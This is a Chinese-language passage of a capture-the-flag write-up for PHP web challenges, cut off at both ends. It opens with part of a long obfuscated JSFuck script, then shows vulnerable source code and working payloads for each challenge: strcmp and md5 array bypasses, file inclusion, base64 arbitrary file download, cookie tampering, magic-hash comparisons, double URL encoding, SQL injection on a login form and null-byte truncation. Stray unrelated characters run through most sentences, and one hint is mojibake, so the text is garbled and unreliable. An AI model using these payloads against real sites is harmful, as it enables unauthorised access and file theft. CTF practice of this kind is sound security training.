)+({}+[])[!![]+!![]]+(+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+[])[!![]+!![]+!![]])+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[+[]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+[]))+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])))()
控制臺(tái)執(zhí)行,頁面顯示一個(gè)php文件抑钟，文件名是md5加密涯曲，解密為md5.php。

1bc29b36f623ba82aaf6724fd3b16718.php

打開網(wǎng)頁
tip:history of bash
“.bash_history”文件保存執(zhí)行的history命令味赃。
打開.bash_history
http://teamxlc.sinaapp.com/web3/b0b0ad119f425408fc3d45253137d33d/.bash_history

zip -r flagbak.zip ./*

打開flagbak.zip
直接可下載掀抹，是一個(gè)flag.txt文件

flag is:nctf{bash_history_means_what}

flag is:nctf{bash_history_means_what}

pass check

核心源碼

<?php
$pass=@$_POST['pass'];
$pass1=***********;//被隱藏起來的密碼
if(isset($pass))
{
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
}else{
echo "the pass is wrong!";
}
}else{
echo "please input pass!";
}
?>

傳送門：題目地址

頁面只有一行
please input pass!
分析：
1.看源碼意思是post的pass要和pass1相等
2.@在php中是可以屏蔽函數(shù)執(zhí)行過程中遇到問題而產(chǎn)生的一些錯(cuò)誤、警告信息心俗，這樣用戶就看不到程序的出錯(cuò)信息傲武。
3.strcmp()函數(shù)

4.兩個(gè)string相等，則為0城榛，所以在strcmp()前面加了感嘆號(hào)揪利！。
5.利用PHP弱類型漏洞狠持。
post 一個(gè)數(shù)組,令strmp()返回null疟位，則"!null"為真,執(zhí)行echo "flag:nctf{*}"
1.開始是這樣構(gòu)建的pass=[]，沒用喘垂。

2.應(yīng)該這樣構(gòu)建pass[]=123

flag:nctf{strcmp_is_n0t_3afe}

Header

頭疤鹂獭！正勒！頭暗迷骸！Ｕ抡辍祥绞！
傳送門: 點(diǎn)我咯

直接看header
nctf{tips_often_hide_here}

文件包含

沒錯(cuò) 這就是傳說中的LFI
傳送門點(diǎn)我?guī)泔w
TIPS:http://drops.wooyun.org/tips/3827

不看了，這題和Bugku的（flag在index里）是一樣的鸭限，參見[Bugku writeup]Web
nctf{edulcni_elif_lacol_si_siht}

單身一百年也沒用

是的蜕径。。這一題你單身一百年也沒用
傳送門：biu~

老套路败京，查看網(wǎng)絡(luò)狀態(tài)兜喻，點(diǎn)進(jìn)去看看什么變化
之前index.php的304狀態(tài)變成了302，flag就在響應(yīng)頭里
nctf{this_is_302_redirect}

Download~!

想下啥就下啥_{別下音樂喧枷，不騙你虹统，試試下載其他東西}
真·奧義·傳送：點(diǎn)我

查看源碼

<pre id="line1">  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<title>Game 19</title>  
<link href="[templatemo_style.css](view-source:http://way.nuptzj.cn/web6/templatemo_style.css)" rel="stylesheet" type="text/css" />  
</head>  <body>  
<div id="templatemo_container">  <div id="templatemo_header">  <div id="website_title">  </div>  </div>  <div id="templatemo_menu">  
<ul>  <li><a href="[#](view-source:http://way.nuptzj.cn/web6/#)" class="current">Tips</a></li>  <li><b>down</b></li>  
</ul>  </div>  
<div id="templatemo_content_wrapper">  <div id="templatemo_content">  <div class="content_title_01">聽會(huì)歌吧</div>  <div class="horizontal_divider_01">&nbsp;</div>  <
div class="cleaner">&nbsp;
</div>  
<p>為了讓大家更輕松的比賽弓坞，為大家準(zhǔn)備了兩首歌讓大家下載</p>  
<p><a href="[download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=](view-source:http://way.nuptzj.cn/web6/download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=)" target="_blank">星星點(diǎn)燈</a>
</p>  <p>
<a href="[download.php?url=YnV4aWFuZ3poYW5nZGEubXAz](view-source:http://way.nuptzj.cn/web6/download.php?url=YnV4aWFuZ3poYW5nZGEubXAz)" target="_blank">不想長大</a>
</p>  
<div class="cleaner">&nbsp;
</div>  
</div>  
<div class="cleaner">&nbsp;</div>  
</div>  <div id="templatemo_footer">  
</div>  </div>  </body>  </html></pre>

點(diǎn)擊"download.php?url=YnV4aWFuZ3poYW5nZGEubXAz"，文件名base64加密车荔，試試下載其他文件渡冻，一般都是想要當(dāng)前頁面的源碼，于是將download.php加密忧便，構(gòu)造：
view-source:http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw,這樣可以不用下載就可以看到源碼

??<?php
error_reporting(0);
include("hereiskey.php");
$url=base64_decode($_GET[url]);
if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){
    $file_size = filesize($url);
    header ( "Pragma: public" );
    header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );
    header ( "Cache-Control: private", false );
    header ( "Content-Transfer-Encoding: binary" );
    header ( "Content-Type:audio/mpeg MP3");
    header ( "Content-Length: " . $file_size);
    header ( "Content-Disposition: attachment; filename=".$url);
    echo(file_get_contents($url));
    exit;
}
else {
    echo "Access Forbidden!";
}
?>

繼續(xù)查看"hereiskey.php"源碼：view-source:http://way.nuptzj.cn/web6/download.php?url=aGVyZWlza2V5LnBocA==

?<?php
//flag:nctf{download_any_file_666}
?>

nctf{download_any_file_666}

COOKIE

COOKIE就是甜餅的意思~
地址：傳送門

TIP:
0==not

利用tamper data修改cookie的login=1就可以了
顯示：
flag:nctf{cookie_is_different_from_session}
nctf{cookie_is_different_from_session}

MYSQL

不能每一題都這么簡單嘛
你說是不是族吻？
題目地址

查看robots.txt：http://chinalover.sinaapp.com/web11/robots.txt

鍒お寮€蹇冿紝flag涓嶅湪榪欙紝榪欎釜鏂囦歡鐨勭敤閫斾綘鐪嬪畬浜嗭紵
鍦–TF姣旇禌涓紝榪欎釜鏂囦歡寰€寰€瀛樻斁鐫€鎻愮ず淇℃伅

TIP:sql.php

<?php
if($_GET[id]) {
   mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $id = intval($_GET[id]);
  $query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));
  if ($_GET[id]==1024) {
      echo "<p>no! try again</p>";
  }
  else{
    echo($query[content]);
  }
}
?>

對(duì)sql.php傳入id參數(shù)，開始還沒相通id=1024的意義珠增，還試著爆破id超歌，后來想想，其實(shí)id=1024才是flag的內(nèi)容蒂教。
1.要讓$id=1024
2.傳入的參數(shù)$_GET[id]又不能等于1024
3.利用intval()取整函數(shù)構(gòu)造
令$_GET[id]=1024.1即可：
http://chinalover.sinaapp.com/web11/sql.php?id=1024.1

the flag is:nctf{query_in_mysql}

nctf{query_in_mysql}

md5 collision

源碼

<?php
$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {
    echo "nctf{*****************}";
} else {
    echo "false!!!";
}}
else{echo "please input a";}
?>

傳送門：題目地址

打開,顯示一行字

please input a

要傳入一個(gè)參數(shù)
1.a!=QNKCDZO
2.md5(a)==md5('QNKCDZO')
好像沒頭緒巍举，看看md5('QNKCDZO')是什么樣子：
0e830400451993494058024219903391
0e開頭，利用“==”的特性：對(duì)比的時(shí)候會(huì)進(jìn)行數(shù)據(jù)轉(zhuǎn)換凝垛，0eXXXXXXXXXX 轉(zhuǎn)成0了懊悯。
結(jié)合0e開頭MD5值：

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

傳入?yún)?shù)a=s878926199a:
http://chinalover.sinaapp.com/web19/?a=s878926199a

nctf{md5_collision_is_easy}

要看清是get還是post，開始我就一直在post梦皮，結(jié)果怎么也出不來結(jié)果炭分。
nctf{md5_collision_is_easy}

bypass again

地址：依舊是弱類型

來源 hctf

if (isset($_GET['a']) and isset($_GET['b'])) {
if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) == md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}

要求：
1.傳入兩個(gè)參數(shù)a和b
2.a!=b
3.md5(a)==md5(b)
利用內(nèi)置函數(shù)的參數(shù)的松散性：調(diào)用函數(shù)時(shí)給函數(shù)傳遞函數(shù)無法接受的參數(shù)類型。
傳入兩個(gè)數(shù)組剑肯，使得md5()返回null捧毛，null==null：
http://chinalover.sinaapp.com/web17/index.php?a[]=1&b[]=2

if (isset($_GET['a']) and isset($_GET['b'])) {
if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) == md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
}
Flag: nctf{php_is_so_cool}

這次又搞清是get還是post，又一頓post让网，真是服了我自己
nctf{php_is_so_cool}

PHP是世界上最好的語言

聽說PHP是世界上最好的語言
地址：題目地址

打開index.txt:
http://way.nuptzj.cn/php/index.txt

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>


<br><br>
Can you authenticate to this website?

開始還在倒騰 eregi（）函數(shù): 字符串比對(duì)解析呀忧，與大小寫無關(guān)。
后面發(fā)現(xiàn)源代碼里對(duì)id又一次urldecode溃睹，所以我們要對(duì)id兩次urlencode
1.因?yàn)閡rl編碼一般是不會(huì)對(duì)字母轉(zhuǎn)換的
2.先將hackerDJ轉(zhuǎn)成16進(jìn)制荐虐，再每兩個(gè)數(shù)字前加百分號(hào)：%63%6b%65%72%44%4a
3.再urlencode： %2563%256b%2565%2572%2544%254a
http://way.nuptzj.cn/php/index.php/?id=%2563%256b%2565%2572%2544%254a

Access granted!

flag: nctf{php_is_best_language}


Can you authenticate to this website? index.txt

后記：
url解碼過程：
%-->%
%25-->%
其實(shí)第二次urlencode是對(duì)%-->%25,那么可以再對(duì)一個(gè)字符二次編碼即可：%2563%6b%65%72%44%4a，反正其他%依然解碼為%
nctf{php_is_best_language}

SQL注入1

聽說你也會(huì)注入丸凭？
地址：題目地址

點(diǎn)source

<html>
<head>
Secure Web Login
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
    mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = trim($_POST[user]);
  $pass = md5(trim($_POST[pass]));
  $sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";
    echo '</br>'.$sql;
  $query = mysql_fetch_array(mysql_query($sql));
  if($query[user]=="admin") {
      echo "<p>Logged in! flag:******************** </p>";
  }
  if($query[user] != "admin") {
    echo("<p>You are not admin!</p>");
  }
}
echo $query[user];
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.phps">Source</a>
</html>

php的點(diǎn)是連接符

SQLstr = "select    *    from abc_table where user_name = ' " . $user_name . " ' ";   
可以改寫成
SQLstr = "select    *    from abc_table where user_name = ' $user_name ' ";

沒有過濾，SQL注入只需要閉合‘）即可,且user=admin
nctf{ni_ye_hui_sql?}

/x00

題目地址：題目有多種解法腕铸，你能想出來幾種惜犀？

頁面給了源碼

 view-source:

    if (isset ($_GET['nctf'])) {
        if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)
            echo '必須輸入數(shù)字才行';
        else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)   
            die('Flag: '.$flag);
        else
            echo '騷年，繼續(xù)努力吧啊~';
    }

要求：
1.傳入nctf參數(shù)
2.nctf參數(shù)以數(shù)字開頭狠裹，中間多個(gè)數(shù)字虽界，數(shù)字結(jié)尾：^[1-9]+$-->全為數(shù)字
3.nctf==#biubiubiu，才打印出flag
利用0x00截?cái)鄀reg()
注意要urlencode:
0x00-->%00
#-->%23
令nctf=123%00%23biubiubiu
刷新出現(xiàn)flag
Flag: flag:nctf{use_00_to_jieduan}
nctf{use_00_to_jieduan}
后記：
令nctf[]=123涛菠，得到：
Warning: strpos() expects parameter 1 to be string, array given in web4/f5a14f5e6e3453b78cd73899bad98d53/index.php on line 10
Flag: flag:nctf{use_00_to_jieduan}
解析：
-->ereg()是處理字符串的莉御，當(dāng)處理數(shù)組的時(shí)候撇吞，返回NULL
-->NULL===FALSE（嚴(yán)格比較返回FALSE）
-->strpos()是處理字符串的，當(dāng)處理數(shù)組的時(shí)候礁叔，返回NULL
-->NULL===FALSE（嚴(yán)格比較）不成立牍颈，NULL!==FALSE，打印flag
參考：

變量覆蓋

聽說過變量覆蓋么琅关？
地址：題目地址

查看source.php

 <?php
